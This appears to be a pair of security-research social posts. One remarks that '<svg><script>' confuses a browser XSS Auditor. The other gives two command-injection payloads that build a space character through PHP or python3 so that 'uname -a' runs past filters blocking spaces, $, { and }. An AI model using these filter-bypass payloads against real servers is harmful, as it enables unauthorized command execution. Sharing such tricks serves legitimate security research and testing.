@garethheyes Strange thing with <svg><script> is that it confuses the XSS Auditor. It's fine in the source code (no red), but is blocked nonetheless.
Command injection without space, $, {, }
Python3 or PHP on server?
uname`cat<<<'<?="\x20"?>'|php`-a
uname`cat<<<'print("\x20")'|python3`-a